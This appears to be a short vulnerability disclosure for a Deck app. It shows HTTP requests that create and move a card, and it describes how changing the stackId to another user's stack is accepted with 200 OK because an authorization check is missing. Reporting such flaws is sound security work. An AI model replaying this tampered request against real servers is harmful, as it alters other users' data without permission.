When moving a task to another deck a request is made to /apps/deck/cards/XXXX. in the request the destination stackId parameter is used. When a user changes the parameter to that of a stack not belonging to him the task is still added.
Create a card:
POST /apps/deck/cards HTTP/1.1
[...]
{"title":"SOME_TEST","stackId":1,"type":"plain"}
Move the Card:
PUT /apps/deck/cards/13 HTTP/1.1
[...]
{"title":"SOME_TEST","description":"","stackId":2,"type":"plain","lastModified":1588755341,"lastEditor":null,"createdAt":1588755341,"labels":null,"assignedUsers":null,"attachments":null,"attachmentCount":null,"owner":"test1","order":999,"archived":false,"duedate":null,"deletedAt":0,"commentsUnread":0,"id":13,"overdue":0}
When now intercepting and changing the stackId
to 6
(that of another user) the server responds with a 200 OK
and the card is added to the stack of the receiving user.
Deck of other users can be polluted. Missing authorization check.